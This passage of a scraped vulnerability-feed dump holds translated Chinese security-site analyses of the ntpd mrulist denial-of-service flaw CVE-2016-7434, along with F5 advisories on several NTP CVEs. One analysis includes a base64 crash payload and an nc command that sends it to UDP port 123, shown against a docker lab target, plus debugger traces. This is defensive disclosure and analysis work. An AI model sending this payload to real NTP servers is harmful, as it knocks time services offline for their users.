[DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>). The monlist feature was later disabled and replaced by the Mode 6 mrulist feature in order to avoid NTP amplification attacks, and this vulnerability is caused by mrulist.\n\nWe send a malformed packet using the CVE-2016-7434 payload while capturing packets to analyze the data.\n\n!
[](/Article/UploadPic/2016-12/2016123154243705.jpg)\n\nAs you can see, the first byte is 16, which in binary is 00010110. According to the earlier analysis of the NTP protocol format, bits 0 and 1 are the Leap Indicator; a value of 11 is the alarm state, representing a time synchronization problem, and other values are not processed. Here it is 00. Bits 2, 3 and 4 are 010, representing the version. Bits 5, 6 and 7 are 110, representing the Mode; here it is 6, which indicates mrulist processing.\n\nCVE-2016-7434 vulnerability analysis\n\nOn Linux we attach gdb to ntpd and send the payload; gdb then captures the ntpd crash.\n\n/Article/UploadPic/2016-12/2016123154243426.png\n\nThe bt command shows the call stack before the crash:\n\n__strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50\n\n50 ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S: No such file or directory.\n\n(gdb) bt\n\n#0 __strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50\n\n#1 0x080948f0 in estrdup_impl (str=0x0) at emalloc.c:128\n\n#2 0x0805f9b3 in read_mru_list (rbufp=0x89d3dd8, restrict_mask=0)\n\nat ntp_control.c:4041\n\n#3 0x0806a694 in receive (rbufp=0x89d3dd8) at ntp_proto.c:659\n\n#4 0x080598f7 in ntpdmain (argc=0, argv=0xbff16c94) at ntpd.c:1329\n\n#5 0x0804af9b in main (argc=4, argv=0xbff16c84) at ntpd.c:392\n\nYou can see that frame #1 calls estrdup_impl in emalloc.c with the parameter str equal to 0x0. Let us look directly at emalloc.
c, at the corresponding portion of the code.\n\nchar *\n\nestrdup_impl(\n\nconst char *str\n\n#ifdef EREALLOC_CALLSITE\n\n,\n\nconst char *file,\n\nint line\n\n#endif\n\n)\n\n{\n\nchar *copy;\n\nsize_t bytes;\n\nbytes = strlen(str) + 1;\n\nIf str is 0x0 here, strlen reads from address 0x0 to compute the length, and this location is unreadable.\n\ngdb-peda$ x/10x 0x0\n", "modified": "2016-12-03T00:00:00", "published": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81716.htm", "id": "MYHACK58:62201681716", "type": "myhack58", "title": "Doing things the NTP----CVE-2016-7434 vulnerability analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-17T15:12:07", "bulletinFamily": "info", "cvelist": ["CVE-2016-7434"], "edition": 1, "description": "Author: LJ, dawu (know Chong Yu 404 laboratory)\n\n## Preface\n\nThe NTP service is essential to the Internet, and many things can be linked to it. Its shadow also appeared in the sensational network outage in Germany not long ago. Ensuring the security of NTP servers is very important!\n\n## 0x00 vulnerability overview\n\n### 1. Vulnerability description\n\nNTPD is a service program that synchronizes time between different machines on Linux systems. \nNTP.org recently published a denial-of-service vulnerability that can subject the NTPD service to a remote DoS attack.\n\n### 2. Vulnerability\n\nThe affected versions face a risk of DoS attack\n\n### 3. Affected versions\n\n* 4.3.90\n* 4.3.25\n* 4.3\n* 4.3.93\n* 4.3.92\n* 4.3.77\n* 4.3.70\n* 4.2.8p8\n* 4.2.8p7\n* 4.2.8p6\n* 4.2.8p5\n* 4.2.8p4\n* 4.2.8p3\n* 4.2.8p2\n* 4.2.8p1\n* 4.2.
7p22\n\n## 0x01 vulnerability details\n\n### Vulnerability details\n\nThe NTPD server-side configuration has low security and accepts mrulist packets from any host. In this case an attacker can remotely send a crafted mrulist packet to carry out a DoS attack.\n\n### Vulnerability detection method\n\nUse the following command to detect the NTP version: # ntpq -c version. A version in the affected versions list that has no related security configuration is affected by the vulnerability. An exploit PoC has been published on GitHub, but the PoC crashes the NTPD service, so the service needs to be restarted after it is used. \n[Exploit poc](<https://github.com/opsxcq/exploit-CVE-2016-7434/blob/master/exploit.py>)\n\n### Vulnerability reproduction\n\nBuild the environment with docker:\n\n\ndocker run --rm -it --name ntpvulnerable -p 123:123/udp vulnerables/cve-2016-7434 \n\n\n![](/Article/UploadPic/2016-12/20161217105154360.png)Then enter on the command line:\n\n\necho \"FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRypvtdokhyywdzptmylcbsywrkcj1bxtpxt1aamiwgbgfkzhi9w106v09qaaa=\" | base64-d | nc-u-v 127.0.0.1 123 \n\n\nFinally, the NTPD service crashes ![](/Article/UploadPic/2016-12/20161217105155656.png)![](/Article/UploadPic/2016-12/20161217105155555.png)\n\n### Vulnerability analysis\n\n#### payload analysis\n\nThe discoverer of the vulnerability constructed the following mrulist packet\n\n\nFgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRypvtdokhyywdzptmylcbsywrkcj1bxtpxt1aamiwgbgfkzhi9w106v09qaaa= \n\n\nbase64 decoded to:\n\n![base64.png](/Article/UploadPic/2016-12/20161217105155515.
png)\n\nBase64-decoded, displayed in hexadecimal:\n\n\n\\x16 \\x0a \\x00 \\x10 \\x00 \\x00 \\x00 \\x00 \n\\x00 \\x00 \\x00 \\x36 \\x6e \\x6f \\x6e \\x63 \n\\x65 \\x2c \\x20 \\x6c \\x61 \\x64 \\x64 \\x72 \n\\x3d \\x5b \\x5d \\x3a \\x48 \\x72 \\x61 \\x67 \n\\x73 \\x3d \\x33 \\x32 \\x2c \\x20 \\x6c \\x61 \n\\x64 \\x64 \\x72 \\x3d \\x5b \\x5d \\x3a \\x57 \n\\x4f \\x50 \\x00 \\x32 \\x2c \\x20 \\x6c \\x61 \n\\x64 \\x64 \\x72 \\x3d \\x5b \\x5d \\x3a \\x57 \n\\x4f \\x50 \\x00 \\x00 \n\n\nFor reference, the NTP protocol format:\n\nThe NTP packet = NTP header + Four TimeStamps = 48byte\n\nNTP header : 16byte\n\n| LI(LeapYearIndicator) | VN(VersionNumber) | Mode | Stratum | Poll(PollInterval) | Precision \n---|---|---|---|---|--- \n2bit | 3bit | 3bit | 8bit | 8bit | 8bit \n\nFor details, see [NTP packet format](<http://support.ntp.org/bin/view/Support/DraftRfc2030>)\n\n> The main fields are explained as follows: \u00b7LI (Leap Indicator, leap second hint): 2 bits long; a value of \u201c11\u201d indicates the alarm state, meaning the clock is not synchronized. For other values, NTP itself does no processing. \u00b7VN (Version Number): 3 bits long, indicating the NTP version number; the latest version is currently 4. \u00b7Mode: 3 bits long, indicating the NTP mode. The values mean: 0 is undefined, 1 is active peer mode, 2 is passive peer mode, 3 is client mode, 4 is server mode, 5 is broadcast or multicast mode, 6 indicates that the packet is an NTP control message, and 7 is reserved for internal use. \u00b7Stratum: the stratum of the system clock, with a value range of 1 to 16, which defines the clock accuracy. A stratum 1 clock has the highest accuracy, accuracy decreases from 1 to 16, and a stratum 16 clock is in the unsynchronized state. 
\u00b7Poll: the polling time, i.e., the time interval between two successive NTP packets. \u00b7Precision: the system clock accuracy.\n\nHaving understood the NTP packet format, the NTP header of the packet above is:\n\n\n\\x16 \\x0a \\x00 \\x10 \\x00 \\x00 \\x00 \\x00\n\\x00 \\x00 \\x00 \\x36 \\x6e \\x6f \\x6e \\x63\n\n\nThe payload analysis cannot go further for now, so we turn to studying the vulnerability trigger point\n\n#### Vulnerability trigger point analysis\n\nAs shown in the figure below, we use the debug information given by valgrind to find the vulnerability trigger point ![](/Article/UploadPic/2016-12/20161217105155180.png)\n\nThe vulnerability trigger point is located at ntpd/ntp_control.c:4041, inside the read_mru_list() function ![](/Article/UploadPic/2016-12/20161217105155932.png)\n", "modified": "2016-12-17T00:00:00", "published": "2016-12-17T00:00:00", "id": "MYHACK58:62201682160", "href": "http://www.myhack58.com/Article/html/3/62/2016/82160.htm", "title": "NTPD denial of service vulnerability, CVE-2016-7434 analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-03T17:43:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-7434"], "edition": 1, "description": "NTP Protocol Analysis with CVE-2016-7434 \nI will not describe in detail how the client and the NTP server interact over the NTP protocol to synchronize time; a figure gives a brief description of the time synchronization process. In this process the data is transmitted over the NTP protocol, and the server port used for the interaction is port 123. \n![](/Article/UploadPic/2016-12/2016123165929745.png?www.myhack58.com) \nWe download NTP-4.2.8p8, decompress it with tar, and install it with configure, make and make install. After installation, use ./ntpd -n -c [ntp.
conf path]the method run ntpd, many Linux system comes with NTP, you need to switch to the NTPD directory implementation the directory of the NTP to ensure that the version is the problematic version. \n! [](/Article/UploadPic/2016-12/2016123165929951. png? www. myhack58. com) \nWe take a look at the NTP Protocol format. \n! [](/Article/UploadPic/2016-12/2016123165929641. png? www. myhack58. com) \nAbout the NTP Protocol each field of meanings, online are explained, here I will not repeat them here, in the middle of this that relates to one Mode, it represents the work mode, here it is worth mentioning that in previous NTP Protocol, usually with the Mode7 of the monlist feature to respond to NTP requests, but due to the monlist vulnerability exists that can exploit this vulnerability to NTP amplification attack, which is[DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>), and later monlist feature is disabled, is changed Mode6 the mrulist characteristics, in order to avoid NTP amplification attacks, while this vulnerability is due to the mrulist. \nWe by CVE-2016-7434 the Payload to send a malformed packet, while packet capture analysis data. \n! [](/Article/UploadPic/2016-12/2016123165929436.jpg) \nYou can see, the first byte is 16, convert to binary is 00010110, according to the Before for the NTP Protocol format of the analysis, the 0 and 1 bits represent the Leap Indicator when the value is 11 when the alarm state representing the time synchronization problem, the other is not processed, here is 00; then 2, 3, 4 bits are 010, representing the IS version, after the 5 -, 6 -, and 7-bit 110 represents the is Mode, here it is 6, representing the mrulist characteristics of the process. \nCVE-2016-7434 vulnerability analysis\nWe under Linux with gdb attach method to attach ntpd, send a payload after a gdb capture to ntpd to crash. \n! [](/Article/UploadPic/2016-12/2016123165929156. png? www. myhack58. 
com) \nThrough the bt command, back it out before the collapse of the stack call\n__strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S:50 \n50../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S: No such file or directory. \n(gdb) bt \n#0 __strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S:50 \n#1 0x080948f0 in estrdup_impl (str=0x0) at emalloc. c:128 \n#2 0x0805f9b3 in read_mru_list (rbufp=0x89d3dd8, restrict_mask=0) \nat ntp_control. c:4041 \n#3 0x0806a694 in receive (rbufp=0x89d3dd8) at ntp_proto. c:659 \n#4 0x080598f7 in ntpdmain (argc=0, argv=0xbff16c94) at ntpd. c:1329 \n#5 0x0804af9b in main (argc=4, argv=0xbff16c84) at ntpd. c:392 \nYou can see that in the#1 Position call emalloc. c estrdup_impl, the parameter str value is 0x0, a direct look at the emalloc. c in the corresponding portion of the code. \nchar * \nestrdup_impl( \nconst char *str \n#ifdef EREALLOC_CALLSITE \n, \nconst char *file, \nintline \n#endif \n) \n{ \nchar *copy; \nsize_tbytes; \nbytes = strlen(str) + 1; \nHere if the str value is 0x0, then, in the strlen will read the 0x0 address of the location to store the value of length, this location is unreadable. \ngdb-peda$ x/10x 0x0 \n0x0: Cannot access memory at address 0x0 \nThus causing a denial of service occurs, in estrdup_impl before the call, the call to read_mru_list, this function is processing mrulist properties of the function, in this function call before the ntpdmain and receive function for receiving. \nTake a look at read_mru_list processing mrulist characteristic function of the content, in ntp_control. c in the first 4034. \nwhile (NULL != (v = ctl_getitem(in_parms, &val)) && \n! (EOV & v->flags)) { \nint si; \nif (! 
strcmp(nonce_text, v->text)) { \nif (NULL != pnonce) \nfree(pnonce); \npnonce = estrdup(val); \nHere in the pnonce variable assignment position called estrdup, that is, a problem occurs in the function call, then the val's value is 0x0, the tracking read_mru_list, found in the function at the entrance declared the val variable after the while loop entry, and calls ctl_getitem function, where val as a parameter, after that estrdup function call, that is, ctl_getitem function, the val variable assignment. \nTake a look at ctl_getitem a function of the content. \n/* \n* ctl_getitem - get the next data item from the incoming packet \n*/ \nstatic const struct ctl_var * \nctl_getitem( \nconst struct ctl_var *var_list, \nchar **data \n) \nctl_getitem a function of the content is from data packet to obtain the next block of data content, wherein the data value is what we care about val values, we dynamically track The bit val value acquisition process. First, in read_mru_list processing mrulist characteristic function of the logic entry under the Breakpoints tracing. \nAt the function Entrance, the first of May in the data packet to obtain the block name assignment. 
\nconst char nonce_text[] = \"nonce\"; \nconst char frags_text[] = \"frags\"; \nconst char limit_text[] = \"limit\"; \n", "modified": "2016-12-03T00:00:00", "published": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81749.htm", "id": "MYHACK58:62201681749", "type": "myhack58", "title": "Doing things the NTP----CVE-2016-7434 vulnerability analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2017-06-08T00:16:02", "bulletinFamily": "software", "cvelist": ["CVE-2016-9312", "CVE-2015-8138", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-7431"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 
11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-03-14T19:23:00", "published": "2016-12-17T02:37:00", "href": "https://support.f5.com/csp/article/K80996302", "id": "F5:K80996302", "type": "f5", "title": "Multiple NTP vulnerabilities", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-06-08T00:16:16", "bulletinFamily": "software", "cvelist": 
["CVE-2016-7434"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not 
vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-02-08T00:32:00", "published": "2016-11-30T00:10:00", "href": "https://support.f5.com/csp/article/K63326092", "id": "F5:K63326092", "type": "f5", "title": "NTP vulnerability CVE-2016-7434", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-09T00:21:22", "bulletinFamily": "software", "cvelist": ["CVE-2016-7426"], "description": "\nF5 Product Development has assigned ID 630969 (BIG-IP) and INSTALLER-2824 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H51444934 on the **Diagnostics** > **Identified** > **Low** screen. 
\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 | Low | **ntpd** \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 | Low | **ntpd** \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 | Low | **ntpd** \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 \n12.1.2 HF1 | Low | **ntpd** \nBIG-IP Edge Gateway | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | 11.6.1 \n11.5.3 - 11.5.5 | 11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 
\n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 | Low | **ntpd** \nBIG-IP PSM | None | 11.4.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 | Low | **ntpd** \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.0.2 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | **ntpd**\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone. 
To avoid vulnerability exposure, F5 recommends removing the **limited** directive from **ntpd** restriction statements.\n\n**Impact of action:** Various F5 product features rely on proper date and time configuration; ensure that any modifications to the **ntpd** configuration are compatible with your environment.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-10-31T17:38:00", "published": "2016-12-20T01:28:00", "id": "F5:K51444934", "href": "https://support.f5.com/csp/article/K51444934", "title": "NTP vulnerability CVE-2016-7426", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-06T10:21:42", "bulletinFamily": "software", "cvelist": ["CVE-2016-9311"], "edition": 1, "description": "\nF5 Product Development has assigned ID 631841 (BIG-IP), ID 632399 (BIG-IQ), ID 632560 (Enterprise Manager), ID 633055-8 (F5 iWorkflow), and INSTALLER-2825 (Traffix SDC) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H55405388 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP AAM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP AFM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP Analytics| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP APM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP ASM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP DNS| 13.0.0 \n12.0.0 - 12.1.2| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP Link Controller| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP PEM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP WebSafe| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise 
